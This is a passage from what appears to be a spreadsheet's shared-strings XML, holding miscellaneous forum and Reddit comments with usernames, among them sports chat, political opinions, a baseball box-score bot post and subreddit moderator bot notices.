    <t>Been in an accident ? Could be a bad ground</t>
  </si>
  <si>
    <t>bearmaths</t>
  </si>
  <si>
    <t>The only six month rule that anyone *really* follows is for transfers unless you have a valid reason for them to waive it. If management thinks you're ready to move up, it doesn't matter if you've been in your current position for a few hours or a few years.</t>
  </si>
  <si>
    <t>VivaLaDbakes</t>
  </si>
  <si>
    <t>As it's been said, the area around the arena (westgate) is nothing special. There's a top golf and bars in westgate, but all the nicer/hipper stuff is in Downtown and Central Phoenix or Scottsdale. Central Phoenix is the most hipster of the group, lots of good restaurants and breweries/bars there. You will probably want to stay at a hotel near the stadium because the traffic leaving is a bitch, but you'll have to commute to the nice areas. Or stay in the nicer areas and prepare for a cluster fuck on the way out of the game.</t>
  </si>
  <si>
    <t>&gt;&gt;40129040 Canonically he's around 2-something months away from turning 11, so everything that has happened in the anime so far happened within 2 months.</t>
  </si>
  <si>
    <t>Bananawamajama</t>
  </si>
  <si>
    <t>What concerns me about it is that it REPLACES other entitlements rather than supplements it. Unless you choose to take your former entitlements, in which case you dont get the $1000. So if you were a person getting help for something like chronic disability or illness or something, everybody else gets $1000, and you get $1000 - whatever you were getting before. So overall, all the people who theoretically need help the most get the least benefit. Additionally, all that extra spending money will result in inflation, which even Yang admits. His claim is that due to some economics stuff, the inflation will be less than the boost you get from your $1000, so it will be a net gain, and maybe that's true for the typical person, but if you are one of the people formerly getting help, and therefore arent getting a full $1000 gain, then that doesnt really apply to you. So everything is more expensive but you still make the same amount. And finally, this plan supposedly saves money because of administrative costs, but he also says you'll have the option to keep your old entitlement benefits if you want. So you'll still need all that administrative stuff to deal with the people on disability who want their old benefits. So how much money could you actually save?</t>
  </si>
  <si>
    <t>jackknoops</t>
  </si>
  <si>
    <t>3 games is too early to call it an elite year imo, but he definitely is on pace</t>
  </si>
  <si>
    <t>Post: #7 RE: Julian Castro stands on hidden box to look taller (photo)… Eustace Muffins Wrote: (Yesterday 12:26 PM) https://www.washingtonexaminer.com/news/...tic-debate Former Housing Secretary Julián Castro stood on a box during the third Democratic primary debate to help him look taller alongside the other candidates. Castro joined nine other Democratic presidential candidates on the debate stage in Houston on Thursday. Castro, who is 5-foot-9, was one of possibly several candidates that stood on raised platforms behind their podiums. It was not immediately clear whether other candidates were also on boxes. Others had to be, as well. I doubt Warren, Klobuchar and Harris are even as tall as Castro, who is 5 ft. 9in. There is a shot somewhere of them all standing together prior to the debate, O'Rourke looked like the tallest and some were quite small. Be funny if Harris isn't tall yet she called Trump a small dude. She isn't catching on much at all.</t>
  </si>
  <si>
    <t>anonhelp85</t>
  </si>
  <si>
    <t>I think you're right! I would rather spend some time and money going to visit him and finding out it won't work than to wonder if I let the one get away. It's scary as fuck but it needs to be done.</t>
  </si>
  <si>
    <t>&gt;&gt;68426080 Considering everyone ignores the mutant with the parrot, yeah.</t>
  </si>
  <si>
    <t>KaramQa</t>
  </si>
  <si>
    <t>A US loss in the strait of Hormoz will mean that US allies will get off the America train. It will mean a global realignment, leaving America in the cold. First Asia will jump ship, then Europe will go it's own way. The Dollar Empire will end.</t>
  </si>
  <si>
    <t>MoltresFire</t>
  </si>
  <si>
    <t>Not to mention in this version, my WiFi doesn’t auto disconnect anymore and is working like it should without any tweaks. I was using inosleep previously and that’s hefty on the battery.</t>
  </si>
  <si>
    <t>bananacel</t>
  </si>
  <si>
    <t>Drove past a car wit no lights on at night. Honked at them</t>
  </si>
  <si>
    <t>IncrediblyOrdinary_</t>
  </si>
  <si>
    <t>How vulnerable they make you feel if you actually care.</t>
  </si>
  <si>
    <t>piter and</t>
  </si>
  <si>
    <t>The Amazon Alexa app download from the google app store and Apple app store. You can directly go alexa.amazon.com and easily download the Amazon Alexa app in your smartphone. The Alexa app can also be downloaded from the web browser of a computer or laptop, etc. Sign in your Amazon account &amp; install the Alexa app in your device.</t>
  </si>
  <si>
    <t>LibertyPrimeX2</t>
  </si>
  <si>
    <t>Bancrose is black???</t>
  </si>
  <si>
    <t>LonelyFleur</t>
  </si>
  <si>
    <t>I've considered it. But the three things stopping me from investing is the cost (I need at least 200-400 plants MINIMUM to have enough flowers), they are a bit tricky to arrange and design with because of their shape, and they are not unique enough/requested enough to be sold for a premium.</t>
  </si>
  <si>
    <t>mtwoochad1</t>
  </si>
  <si>
    <t>Then back up? I don't see any infuriating at all. Maybe I'm missing something.</t>
  </si>
  <si>
    <t>NSGWP_Mods</t>
  </si>
  <si>
    <t>I believe we also know for a fact that the minimum salary in Academy is 80k</t>
  </si>
  <si>
    <t>honkey-ponkey</t>
  </si>
  <si>
    <t>Aspergers is no longer a thing.</t>
  </si>
  <si>
    <t>christianjail</t>
  </si>
  <si>
    <t>you're starting Mahomes every week so I see this as Mixon for Zeke, no brainer</t>
  </si>
  <si>
    <t>Agent_Miskatonic</t>
  </si>
  <si>
    <t>I thought of one better, even further out of left field, Rey is a Rakattan in disguise</t>
  </si>
  <si>
    <t>stillcantthinkof1</t>
  </si>
  <si>
    <t>This is a very solid marketing strategy. It honestly makes me want to download Apollo</t>
  </si>
  <si>
    <t>box_of_carrots</t>
  </si>
  <si>
    <t>&gt; I decided I'd watch this one at a pub in Stoneybatter because my wife wanted to go fabric shopping. Did she find some nice fabrics to buy?</t>
  </si>
  <si>
    <t>joshba593</t>
  </si>
  <si>
    <t>You can live there now. I just have to get the coordinates.</t>
  </si>
  <si>
    <t>Alastair-Pride</t>
  </si>
  <si>
    <t>We don’t know the full situation, it wasn’t clear if they were taking a long rest, finishing a long rest, or just taking a short one. The group broke stealth and so the Laughing Hand and group investigated the noise.</t>
  </si>
  <si>
    <t>LucidProjection</t>
  </si>
  <si>
    <t>Don't know for sure, but since its not your physical body I would say yes.</t>
  </si>
  <si>
    <t>JohnPlayerSpecialRed</t>
  </si>
  <si>
    <t>Great pic man, thanks for sharing!</t>
  </si>
  <si>
    <t>&gt;&gt;193737616 It's the good kind of autism. But really you could just pull an "Other" category under Affiliated, put what doesn't fit anywhere else and call it a day. Don't even bother with Atrlas and Wandering Sea. If you're feeling masochistic though, you could attempt another chart with a combined Holy Church and True Ancestor/Dead Apostle Ancestor organIzations.</t>
  </si>
  <si>
    <t>Leatherych1cken</t>
  </si>
  <si>
    <t>Although some Dino cards are expensive, there are the structure decks and it's still a good going second deck against some of the really good combo decks. There's also zombie world which is VERY cheap and also anti meta. U could make a zombie deck that could top a regionals for under £100.</t>
  </si>
  <si>
    <t>roseyakali</t>
  </si>
  <si>
    <t>The first spoiled girl. She’s gorgeous and friends with Hannah G.</t>
  </si>
  <si>
    <t>NHLBoy09</t>
  </si>
  <si>
    <t>No.. it was her mother?</t>
  </si>
  <si>
    <t>nathalierachael</t>
  </si>
  <si>
    <t>The Jenny Yoo Spencer has a deeper V but a similar cut, and it has pockets. The model on the website is wearing a weird cut of it... not very representative of what it looks like in person. I’m wearing it for my wedding in 6 days... I’ll be happy to send you a pic of me in it!</t>
  </si>
  <si>
    <t>noheadphones</t>
  </si>
  <si>
    <t>raerae1980 : noheadphones: raerae1980: noheadphones: raerae1980: hodgemann: raerae1980: Warren happened. Tulsi is the one who took her out at the second debate. LOL You're taking Tulsi seriously? Good god The person you don't take seriously wiped out the person you take seriously. That's the angle you'reg with? That's why Tulsi is going so far with her campaign....*eye roll* It's still early - she could gain ground as fast Kamala lost hers. Who knows? She couldnt even get herself into the debate. At least Harris managed to do that. Tulsi has no chance against Biden - or Corey Booker for that matter. The DNC is putting their weight behind Biden - he will be the nominee. Biden will lose, because enough people will vote for an independent Tulsi, Bernie or Warren. Eventually Blue will figure it out, purge the old rich farks choking the DNC, and assemble a body that represents the actual constituency. If it takes to 2024 so be it.</t>
  </si>
  <si>
    <t>PhilsBot</t>
  </si>
  <si>
    <t>|[Phillies @ Nationals](http://mlb.mlb.com/images/2017_ipad/684/phiwas_684.jpg) Game Info|Links| |:--|:--| |**First Pitch:** 04:05 PM EDT @ Nationals Park|[Gameday](https://www.mlb.com/gameday/565972/)| |**Weather:** Partly Cloudy, 89 F, Wind 17 mph, In From LF|[Strikezone Map](http://www.brooksbaseball.net/pfxVB/zoneTrack.php?month=09&amp;day=26&amp;year=2019&amp;game=gid_2019_09_26_phimlb_wasmlb_1/)| |**TV:** Phillies: NBCSP // Nationals: MASN|[Game Graph](http://www.fangraphs.com/livewins.aspx?date=2019-09-26&amp;team=Nationals&amp;dh=0&amp;season=2019)| |**Radio:** Phillies: WTTM1680, 1210WPHT // Nationals: 106.7|**Notes:** [Phillies](http://mlb.mlb.com/mlb/presspass/gamenotes.jsp?c_id=phi), [Nationals](http://mlb.mlb.com/mlb/presspass/gamenotes.jsp?c_id=was)| |Phillies|Pos|AB|R|H|RBI|BB|SO|BA/OBP/SLG|Nationals|Pos|AB|R|H|RBI|BB|SO|BA/OBP/SLG| |:--|:--|:--|:--|:--|:--|:--|:--|:--|:--|:--|:--|:--|:--|:--|:--|:--|:--| |[Hernández, C](http://mlb.mlb.com/team/player.jsp?player_id=514917)|2B|4|1|2|1|0|1|.280/.334/.404|[Turner](http://mlb.mlb.com/team/player.jsp?player_id=607208)|SS|5|0|1|0|0|1|.297/.354/.494| |[Harper](http://mlb.mlb.com/team/player.jsp?player_id=547180)|RF|4|0|0|0|0|3|.258/.373/.504|[Robles](http://mlb.mlb.com/team/player.jsp?player_id=645302)|CF|5|1|1|0|0|1|.254/.324/.419| |[Hoskins](http://mlb.mlb.com/team/player.jsp?player_id=656555)|1B|4|0|1|0|0|3|.229/.365/.462|[Rendon](http://mlb.mlb.com/team/player.jsp?player_id=543685)|3B|2|1|0|0|3|2|.321/.411/.601| |[Miller, B](http://mlb.mlb.com/team/player.jsp?player_id=543543)|LF|3|0|0|0|1|1|.233/.309/.514|[Cabrera, A](http://mlb.mlb.com/team/player.jsp?player_id=452678)|2B|2|2|2|2|1|0|.257/.340/.438| |[Segura](http://mlb.mlb.com/team/player.jsp?player_id=516416)|SS|2|0|1|0|0|0|.280/.323/.420|[Zimmerman](http://mlb.mlb.com/team/player.jsp?player_id=475582)|1B|3|1|1|0|1|2|.253/.319/.416| |[Rodríguez, S](http://mlb.mlb.com/team/player.jsp?player_id=446481)|SS|1|0|0|0|1|1|.217/.317/.377|[Gomes](http://mlb.mlb.com/team/player.jsp?player_id=543228)|C|3|0|0|1|1|2|.225/.316/.392| |[Haseley](http://mlb.mlb.com/team/player.jsp?player_id=656514)|CF|4|0|0|0|0|2|.256/.316/.391|[Taylor, M](http://mlb.mlb.com/team/player.jsp?player_id=572191)|RF|4|1|3|1|0|1|.233/.290/.337| |[Franco](http://mlb.mlb.com/team/player.jsp?player_id=596748)|3B|3|1|1|0|0|1|.232/.294/.405|[Parra](http://mlb.mlb.com/team/player.jsp?player_id=467827)|LF|3|0|1|0|1|0|.215/.279/.347| |[Knapp](http://mlb.mlb.com/team/player.jsp?player_id=595284)|C|3|1|2|2|0|1|.216/.329/.328|[Strasburg](http://mlb.mlb.com/team/player.jsp?player_id=544931)|P|3|0|0|0|0|2|.167/.200/.222| |[Vargas](http://mlb.mlb.com/team/player.jsp?player_id=450306)|P|1|0|0|0|0|1|.075/.075/.075|[Rainey](http://mlb.mlb.com/team/player.jsp?player_id=663432)|P|0|0|0|0|0|0|.000/.000/.000| |[Garcia, Ed](http://mlb.mlb.com/team/player.jsp?player_id=658305)|P|0|0|0|0|0|0|.000/.000/.000|[Suzuki](http://mlb.mlb.com/team/player.jsp?player_id=435559)|PH|1|0|0|0|0|0|.262/.320/.476| |[Williams, N](http://mlb.mlb.com/team/player.jsp?player_id=608384)|PH|1|0|0|0|0|1|.154/.200/.250|[Guerra, Ja](http://mlb.mlb.com/team/player.jsp?player_id=457915)|P|0|0|0|0|0|0|.000/.000/.000| |[Davis, A](http://mlb.mlb.com/team/player.jsp?player_id=656354)|P|0|0|0|0|0|0|.000/.000/.000|[Rodney](http://mlb.mlb.com/team/player.jsp?player_id=407845)|P|0|0|0|0|0|0|.000/.000/.000| |[Morrison](http://mlb.mlb.com/team/player.jsp?player_id=489149)|PH|1|0|0|0|0|0|.182/.250/.394|[Hudson, D](http://mlb.mlb.com/team/player.jsp?player_id=543339)|P|0|0|0|0|0|0|.000/.000/.000| |[Pivetta](http://mlb.mlb.com/team/player.jsp?player_id=601713)|P|0|0|0|0|0|0|.080/.080/.080| ||||||||| |Phillies|Nationals| |:--|:--| |**2B**: Knapp (8, Strasburg). **HR**: Hernández, C (13, 4th inning off Strasburg, 0 on, 0 out); Knapp (2, 8th inning off Guerra, Ja, 1 on, 0 out). **TB**: Franco; Hernández, C 5; Hoskins; Knapp 6; Segura. **RBI**: Hernández, C (70); Knapp 2 (8). **Runners left in scoring position, 2 out**: Harper; Haseley. **GIDP**: Harper; Haseley; Miller, B. **Team RISP**: 0-for-4. **Team LOB**: 3. |**2B**: Robles (33, Vargas); Taylor, M (6, Vargas); Cabrera, A (24, Vargas). **HR**: Taylor, M (1, 2nd inning off Vargas, 0 on, 0 out); Cabrera, A (18, 7th inning off Davis, A, 0 on, 0 out). **TB**: Cabrera, A 6; Parra; Robles 2; Taylor, M 7; Turner; Zimmerman. **RBI**: Cabrera, A 2 (88); Gomes (43); Taylor, M (3). **Runners left in scoring position, 2 out**: Turner; Suzuki; Gomes 2; Strasburg 2. **SF**: Cabrera, A. **Team RISP**: 1-for-10. **Team LOB**: 9. | |Phillies|IP|H|R|ER|BB|SO|P-S|ERA|Nationals|IP|H|R|ER|BB|SO|P-S|ERA| |:--|:--|:--|:--|:--|:--|:--|:--|:--|:--|:--|:--|:--|:--|:--|:--|:--|:--| |[Vargas](http://mlb.mlb.com/team/player.jsp?player_id=450306)|4.1|6|5|4|5|3|101-57|4.51|[Strasburg](http://mlb.mlb.com/team/player.jsp?player_id=544931)|6.0|4|1|1|0|10|92-61|3.32| |[Garcia, Ed](http://mlb.mlb.com/team/player.jsp?player_id=658305)|0.2|0|0|0|2|2|16-7|5.84|[Rainey](http://mlb.mlb.com/team/player.jsp?player_id=663432)|1.0|0|0|0|1|2|20-11|3.99| |[Davis, A](http://mlb.mlb.com/team/player.jsp?player_id=656354)|2.0|3|1|1|0|4|40-28|6.86|[Guerra, Ja](http://mlb.mlb.com/team/player.jsp?player_id=457915)|0.1|3|2|2|0|0|24-15|4.73| |[Pivetta](http://mlb.mlb.com/team/player.jsp?player_id=601713)|1.0|0|0|0|0|2|12-8|5.46|[Rodney](http://mlb.mlb.com/team/player.jsp?player_id=407845)|0.2|0|0|0|0|0|7-5|5.79| | |||||||||[Hudson, D](http://mlb.mlb.com/team/player.jsp?player_id=543339)|1.0|0|0|0|1|3|19-12|2.50| Linescore|1|2|3|4|5|6|7|8|9||R|H|E|LOB :--|:--|:--|:--|:--|:--|:--|:--|:--|:--|:--|:--|:--|:--|:-- [Phillies](/r/Phillies)|0|0|0|1|0|0|0|2|0||3|7|0|3 [Nationals](/r/Nationals)|1|1|0|0|3|0|1|0|||6|9|0|9 Inning|Scoring Play Description|Score :--|:--|:-- Bottom 1|Asdrubal Cabrera out on a sacrifice fly to center fielder Adam Haseley. Victor Robles scores. |1-0 WSH Bottom 2|Michael A. Taylor homers (1) on a fly ball to center field. |2-0 WSH Top 4|Cesar Hernandez homers (13) on a fly ball to right field. |2-1 WSH Bottom 5|Yan Gomes walks. Anthony Rendon scores. Asdrubal Cabrera to 3rd. Ryan Zimmerman to 2nd. |3-1 WSH | |Edgar Garcia intentionally walks Gerardo Parra. |4-1 WSH | |Stephen Strasburg strikes out swinging. |5-1 WSH Bottom 7|Asdrubal Cabrera homers (18) on a fly ball to center field. |6-1 WSH Top 8|Andrew Knapp homers (2) on a fly ball to left center field. Maikel Franco scores. |6-3 WSH |Team|Highlight|Links| |:--|:--|:--| |[WSH](/r/Nationals)|Cabrera's sac fly in 1st (00:00:38)| [HD](https://cuts.diamond.mlb.com/FORGE/2019/2019-09/26/c5546563-71ea1ab0-b6976b7e-csvm-diamondx64-asset_1280x720_59_4000K.mp4)| |[PHI](/r/Phillies)|Haseley's home run robbery (00:00:41)| [HD](https://cuts.diamond.mlb.com/FORGE/2019/2019-09/26/ba4f4bbb-8ac4c598-fab43d17-csvm-diamondx64-asset_1280x720_59_4000K.mp4)| |[WSH](/r/Nationals)|Taylor's 1st HR of season (00:00:38)| [HD](https://cuts.diamond.mlb.com/FORGE/2019/2019-09/26/eb1a3257-7f81ff97-f4dcbe90-csvm-diamondx64-asset_1280x720_59_4000K.mp4)| |[WSH](/r/Nationals)|Strasburg sets new high in K's (00:00:12)| [HD](https://cuts.diamond.mlb.com/FORGE/2019/2019-09/26/3d328d6f-6e1f02eb-3f399726-csvm-diamondx64-asset_1280x720_59_4000K.mp4)| |[PHI](/r/Phillies)|Vargas strands two runners (00:00:13)| [HD](https://cuts.diamond.mlb.com/FORGE/2019/2019-09/26/f0d41075-dc8151d2-59f8cb8c-csvm-diamondx64-asset_1280x720_59_4000K.mp4)| |[PHI](/r/Phillies)|Hernandez leads off 4th with HR (00:00:28)| [HD](https://cuts.diamond.mlb.com/FORGE/2019/2019-09/26/4ef148a3-b2767d58-f791a1b5-csvm-diamondx64-asset_1280x720_59_4000K.mp4)| |[PHI](/r/Phillies)|Segura's barehanded grab (00:00:21)| [HD](https://cuts.diamond.mlb.com/FORGE/2019/2019-09/26/eae503a5-097e1483-f99d4705-csvm-diamondx64-asset_1280x720_59_4000K.mp4)| |[WSH](/r/Nationals)|Gomes plates Rendon on walk (00:00:19)| [HD](https://cuts.diamond.mlb.com/FORGE/2019/2019-09/26/4ce1717c-3592424e-237dd55e-csvm-diamondx64-asset_1280x720_59_4000K.mp4)| |[WSH](/r/Nationals)|Cabrera scores on wild pitch (00:00:20)| [HD](https://cuts.diamond.mlb.com/FORGE/2019/2019-09/26/23aef855-fda052d7-c389f7ab-csvm-diamondx64-asset_1280x720_59_4000K.mp4)| |[WSH](/r/Nationals)|Zimmerman scores on passed ball (00:00:24)| [HD](https://cuts.diamond.mlb.com/FORGE/2019/2019-09/26/bb21fbb4-31965e71-6e95bb3d-csvm-diamondx64-asset_1280x720_59_4000K.mp4)| |[PHI](/r/Phillies)|Vargas nabs Robles at second (00:00:38)| [HD](https://cuts.diamond.mlb.com/FORGE/2019/2019-09/26/a326e665-04e53f5b-c44d79ce-csvm-diamondx64-asset_1280x720_59_4000K.mp4)| |[WSH](/r/Nationals)|Cabrera's solo HR (00:00:35)| [HD](https://cuts.diamond.mlb.com/FORGE/2019/2019-09/26/7e3e1546-361fcd22-966abe8c-csvm-diamondx64-asset_1280x720_59_4000K.mp4)| |[PHI](/r/Phillies)|Knapp's 2-run HR (00:00:29)| [HD](https://bdata-producedclips.mlb.com/f72f6f89-8ee8-421d-8a3d-b1794e51b83b.mp4)| |[WSH](/r/Nationals)|Turner's inning-ending dive (00:00:15)| [HD](https://cuts.diamond.mlb.com/FORGE/2019/2019-09/26/b947d127-92ae3206-b6082296-csvm-diamondx64-asset_1280x720_59_4000K.mp4)| |[WSH](/r/Nationals)|Strasburg's group hug (00:00:48)| [HD](https://cuts.diamond.mlb.com/FORGE/2019/2019-09/26/21769b87-941306fe-20c9f2d2-csvm-diamondx64-asset_1280x720_59_4000K.mp4)| |[WSH](/r/Nationals)|Strasburg's 250th K (00:00:20)| [HD](https://cuts.diamond.mlb.com/FORGE/2019/2019-09/26/2984ce6e-846506ec-9e188c82-csvm-diamondx64-asset_1280x720_59_4000K.mp4)| |[WSH](/r/Nationals)|Adam Haseley strikes out swinging. (00:00:07)| [HD](https://bdata-producedclips.mlb.com/70d94215-e3a1-42da-8ac6-f860cdeeae87.mp4)| ||See all highlights at [Baseball.Theater](http://baseball.theater/game/20190926/565972)|| ##Final: 6-3 Nationals |Decisions|| |:--|:--| |[PHI](/r/Phillies)|[Vargas](http://mlb.mlb.com/team/player.jsp?player_id=450306) (L, 7-9)| |[WSH](/r/Nationals)|[Strasburg](http://mlb.mlb.com/team/player.jsp?player_id=544931) (W, 18-6), [Hudson, D](http://mlb.mlb.com/team/player.jsp?player_id=543339) (S, 8)| **Next Game:** Friday, September 27, 07:05 PM EDT vs Marlins For more Phillies chat, check out the **[r/Phillies Discord Server](https://discord.gg/mqhV3nd)**</t>
  </si>
  <si>
    <t>Opmetal</t>
  </si>
  <si>
    <t>Relm reborn won’t be in this upcoming new game plus.</t>
  </si>
  <si>
    <t>&gt;&gt;1673807 Enjoy! Though I do hope you plan to eat out sometimes, cause you'd missing out on some good food</t>
  </si>
  <si>
    <t>Hello /u/Fady91, B1) **Please read** all of our [Rules](https://www.reddit.com/r/borrow/wiki/index) and [Borrower FAQ's](https://www.reddit.com/r/borrow/wiki/borrowers) B2) **Do not delete this submission** (or ANY submission past or present), for any reason, or any of your comments as it will result in a ban. If your request is fulfilled or you **no longer need the money** please do one or a combination of A) edit your post to reflect the change, B) flair your post as 'complete' (the flair button is under the body text of the post), and/or C) make a comment that it's no longer needed. B3) **Wait 24 hours** from this post to make another unless this post or the next is prearranged with a particular lender B4) **Vet your lenders! Be careful who you send your personal information to** A) CHECK your lenders r/borrow history by clicking [here.](https://www.loanmanager.co/lender-check/) Do this for every loan request you recieve. B) Are they **BLACKLISTED** or asking for **PROHIBITED ITEMS/INFORMATION** (see [THIS LINK](https://www.reddit.com/r/borrow/wiki/lender_blacklist_prohibited_info))? Message moderators immediately C) Are they eligible (90+ day account, 1000+ karma, not banned) and active (any big account activity gaps?). Ultimately, you are free to accept loans from any user though you do so at your own risk. Loans made with ineligible/banned users will not be tracked by LoansBot and you will not get credit for loans fulfilled by ineligible lenders, so proceed at your own risk B5) Understand and properly use all [LoansBot commands](https://www.reddit.com/r/LoansBot/comments/2ea912/loansbot_basic_usage/) to mark loan status B6) **If you have any questions or concerns whatsoever**, feel free to ask moderators by clicking **[HERE](https://www.reddit.com/message/compose?to=%2Fr%2Fborrow)** LENDERS: L1) **Please read** all of our [Rules](https://www.reddit.com/r/borrow/wiki/index) and [Lender FAQ's](https://www.reddit.com/r/borrow/wiki/lenders) L2) **Vet your borrowers!** A) See items 2 and 3 right below, B) Check for any past REQ posts and scan the comments for red flags, C) Check the [UniversalScammerList](https://universalscammerlist.com/search.php), D) Install [RedditScamLabeler](https://www.reddit.com/r/hardwareswap/comments/ad10kg/meta_reddit_scam_labeler_extension_v15_update/) to your browser, E) Install this quick [karma-earning investigation tool](https://www.reddit.com/r/TheseFuckingAccounts/comments/8gb6a8/metabookmarklet_to_help_identify_karma_farming/) to your browser, F) See these lists of sketchy user behaviors: ["Karma farmers"](https://www.reddit.com/r/borrow/comments/9htkug/meta_be_aware_recent_influx_here_of_bot_managed/), [How to identify high risk borrowers](https://www.reddit.com/r/borrow/comments/5n4rei/meta_lenders_how_to_identify_users_who_are_likely/) L3) Check to see if Fady91 has a [**Post Deletion History**](https://www.reddit.com/r/borrowdeletes/search?q=Fady91&amp;restrict_sr=on) L4) Check Fady91's [**Spam History**](https://www.reddit.com/r/TheseFuckingAccounts/search?q=Fady91&amp;sort=new&amp;restrict_sr=on), [**RedditMetis profile**](https://www.redditmetis.com/user/Fady91), or [**Atomiks Analyzer Profile**](https://atomiks.github.io/reddit-user-analyser/#Fady91), or [Redetective profile](https://www.redective.com/) [**!**](https://www.reddit.com/r/gcdeletes+gcremoves+gcmirror+gcarchive+gcalerts/search?q=Fady91&amp;sort=new&amp;restrict_sr=on) L5) **We have a [Rule 19](https://www.reddit.com/r/borrow/comments/cz5myt/meta_new_rule_concerning_lending_to_borrowers/) that requires new lenders to contact existing lenders holding late debt to OK providing more funds to this post author (borrower). Please adhere to this rule or you will be banned!** Additionally, it is suggested that lenders take into account a user’s **current open loans and repayment history when considering funding a loan**. This includes a) do they have any repayment history? Extra vetting may be required if not, b) are they asking for loans while still having some out (this is not against the rules)? **It is encouraged and courteous to contact current lenders to inquire about open loans**, c) How much has a borrower repaid historically (in total) vs. how much do they have out now in total? "Piling", or lenders **continuously providing loans to borrowers with many already open loans, is highly discouraged** unless the borrower has a very solid repayment history L6) Understand and [properly use](https://www.reddit.com/r/borrow/comments/6a624m/meta_the_usage_model_for_the_loan_command/) all [LoansBot commands](https://www.reddit.com/r/LoansBot/comments/2ea912/loansbot_basic_usage/) to mark loan status L7) **For your convenience**, upon conclusion of this loan you can follow these links for prefilled posts regarding this loan - [PAID](https://www.reddit.com/r/borrow/submit?selftext=true&amp;title=%5BPAID%5D%20%28/u/Fady91%29%20-%20%28Amount%29%20%28Early/On%20Time/Late%29&amp;message=$paid%20/u/Fady91), [LATE](https://www.reddit.com/r/borrow/submit?selftext=true&amp;title=%5BLATE%5D%20%28/u/Fady91%29%20-%20%28Amount%29%20%28Days%20Late%29), [UNPAID](https://www.reddit.com/r/borrow/submit?selftext=true&amp;title=%5BUNPAID%5D%20%28/u/Fady91%29%20%28%23City,%20State,%20Country%20of%20borrower%29%20-%20%28$Amount%29,%20%28Days%20Late%29&amp;message=$paid%20/u/Fady91) Here is a copy of the original post: Hi, I found myself short this month due to previous job not paying the last payslip and new job has a different schedule. I made my formal complaint and I will wait their response in a few weeks. If the previous job send the correct amount, I would be able to pay it off once. The bills are coming and I do have an urgent one that it was notified to me just last week. I am new borrower, so I lower the request (I do need 500, but I realize that it's a lot to ask once) and split in two payment. I could higher up the interest to 150, if no lenders will be interested due to be new. I only have Paypal and I am willing to give other details needed for the lender. *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/borrow) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>Geoff Bailey</t>
  </si>
  <si>
    <t>" Shocking service...emailed 8 times no response called 6 times no reply then got cut off. They must have read I was making a complaint. Never to be used again. "</t>
  </si>
  <si>
    <t>APankow</t>
  </si>
  <si>
    <t>Irrelevant flaps of skin I removed from all babies. That's called a belly button... so removing an extra piece of flappy skin that serves no purpose and provides no purpose in the modern world would not be disrespectful or against their basic rights. You would make me lmao if I could have this conversation face-to-face.</t>
  </si>
  <si>
    <t>Beoraidbeg</t>
  </si>
  <si>
    <t>One in seven adults in New Orleans has a warrant out for arrest and a proposal is to wipe out the warrants and fines</t>
  </si>
  <si>
    <t>Admiral__Kuznetsov</t>
  </si>
  <si>
    <t>You're right, but most tanks can actually watch two directions at the same time. Also they can scan more efficiently due to thermals and optics. But of course, if you're looking at something close, then your efficiency drops significantly and the reaction time is a heap longer than the dude with the rifle. So overall, you're right! :)</t>
  </si>
  <si>
    <t>&gt;Yea I thik AiC is the best grunge band, how could you tell?</t>
  </si>
  <si>
    <t>&gt;&gt;264896641 Really? The same guy narrating the female character?</t>
  </si>
  <si>
    <t>rynnnnns</t>
  </si>
  <si>
    <t>Yes, my friend last year was able to switch from UP to KSR. I believe he did it within the first month of school</t>
  </si>
  <si>
    <t>IfRickSaid</t>
  </si>
  <si>
    <t>I've had a kebab which was just a pita bread, no meat. Ruined 2019. Cheers sons crying</t>
  </si>
  <si>
    <t>&gt; BRUH LET ME WANK A GUITAR FOR 10 MINUTES</t>
  </si>
  <si>
    <t>Krystal the purple ninja</t>
  </si>
  <si>
    <t>Great game, loved it since I was a kid, but it's just difficult to add mods or Add-ons, the latter being even more so because after I installed a furniture add on mincraft began to crash, so I had to uninstall and reinstall it repeatedly but it still crashes the second time it reloads, I dont know how to fix it and google isnt helpful in the slightest</t>
  </si>
  <si>
    <t>&gt;&gt;192966610 the usual place retard</t>
  </si>
  <si>
    <t>papasully</t>
  </si>
  <si>
    <t>Tis the season</t>
  </si>
  <si>
    <t>1og1c</t>
  </si>
  <si>
    <t>NTA but if had sympathized and revealed not gay themselves would have saved the woman real trouble later with someone not so understanding as you.</t>
  </si>
  <si>
    <t>TerribleTransit</t>
  </si>
  <si>
    <t>It's basically "distance 100-X": you can leave either side of a range empty and it'll just search for everything on that side. So you could search for Pokedex number 2- and get everything but Bulbasaur, or -3 and get only the Bulba family.</t>
  </si>
  <si>
    <t>Pike_Gordon</t>
  </si>
  <si>
    <t>Every goddamn one of those players on the pitch needs to go apologize to the away supporters</t>
  </si>
  <si>
    <t>Your submission was removed because it looks like you're posting music without a correct title. The correct format is: **Artist Name - Song Name [genre]** (optional year) Optional extra text Check your post now. Does it have spaces around the dash " - ", and does it have the [genre]? Forgetting these points are almost definitely why it was removed. An example of a correct title: Damu the Fudgemunk - Tea Thyme [instrumental hip-hop/funk] (2010) You will need to delete this post before submitting again (click on delete above). --- **If you are not posting music, please resubmit with the appropriate tag in the title:** {playlist} for music playlists {non-music audio} for audio submissions that are not music {non-music video} for video submissions that are not music *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/Music) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>The_Real_Zora</t>
  </si>
  <si>
    <t>thank you for such an in depth response, this definitely makes sense to visualize, i’m a lot less scared now. win or lose, i’ll definitely post the video haha</t>
  </si>
  <si>
    <t>HUNDmiau</t>
  </si>
  <si>
    <t>Cool, yet it is still correct. Also, yes, they do... And cool that you only try to attack one part of my post, not everything, like someone who can't argue against someone...</t>
  </si>
  <si>
    <t>desertratrunner</t>
  </si>
  <si>
    <t>so sick. When my el oso gives out im either buying this or the ice cream truck</t>
  </si>
  <si>
    <t>FullSharkAlligator</t>
  </si>
  <si>
    <t>It really does seem like the league is retaliating for appealing.</t>
  </si>
  <si>
    <t>2O4863</t>
  </si>
  <si>
